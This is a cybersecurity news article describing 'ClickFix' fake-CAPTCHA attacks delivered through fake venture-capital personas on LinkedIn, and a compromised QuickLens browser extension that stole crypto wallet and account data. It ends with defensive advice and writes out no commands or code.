‘ClickFix’ Hackers Impersonate VCs, Hijack QuickLens Extension in Coordinated Crypto Attack

Cybersecurity threat intelligence indicates a significant evolution in cryptocurrency-focused attack methodologies, with threat actors now employing sophisticated social engineering techniques that bypass traditional security controls. Recent analysis reveals two distinct but complementary attack vectors that have emerged as primary tools for stealing digital assets from cryptocurrency users and investors.

The first attack vector involves the creation of fraudulent venture capital firm personas, specifically targeting professionals in the cryptocurrency and technology sectors through professional networking platforms. Threat actors have established fake investment entities including SolidBit Capital, MegaBit Capital, and Lumax Capital, using these fictitious firms to initiate contact with potential victims via LinkedIn. The initial contact typically involves seemingly legitimate partnership or investment opportunities, which subsequently redirect targets to malicious video conferencing links hosted on counterfeit Zoom and Google Meet domains.

Once a target engages with the fraudulent event links, they are presented with a fabricated Cloudflare CAPTCHA verification page. This social engineering mechanism, termed the ClickFix technique, prompts users to copy a command to their clipboard and execute it through their terminal application. This approach is particularly effective because it converts the victim into the attack delivery mechanism, effectively circumventing conventional endpoint detection and response systems that would typically flag suspicious file downloads or exploit attempts. Security researchers have noted that this technique eliminates the need for traditional exploit frameworks or malicious download attachments, making detection significantly more challenging for security operations teams.

The second attack vector involves the compromise of legitimate browser extensions, specifically targeting extensions with substantial user bases in the technology and cryptocurrency communities. Recent analysis identified QuickLens, a Google Lens integration extension with approximately 7,000 active users, which was compromised following a change of ownership on February 1st. The malicious version, released two weeks after acquisition, incorporated scripts designed to harvest cryptocurrency wallet credentials, seed phrases, and sensitive financial data. Additionally, the compromised extension was configured to exfiltrate Gmail inbox contents, YouTube channel authentication tokens, and various login credentials entered into web forms.

The ClickFix methodology has demonstrated particular effectiveness across multiple industry verticals beyond cryptocurrency, with Microsoft Threat Intelligence documenting campaigns targeting thousands of enterprise and end-user devices globally on a daily basis. Industries particularly affected include manufacturing, wholesale and retail operations, government entities at the state and local levels, utilities, and energy sector organizations. This widespread adoption by threat actors reflects the technique's effectiveness at bypassing security controls that organizations have invested in over many years.

The infrastructure supporting these campaigns demonstrates advanced operational security practices, including the rotation of identities and attack infrastructure as soon as individual campaign elements are exposed or analyzed by security researchers. This dynamic approach to campaign management significantly complicates attribution efforts and reduces the effectiveness of traditional threat intelligence sharing mechanisms.

Organizations and individuals operating in cryptocurrency markets should implement enhanced verification protocols for any investment-related communications received through professional networking platforms, maintain heightened scrutiny of browser extension permissions, and ensure that terminal execution prompts receive additional validation before user execution.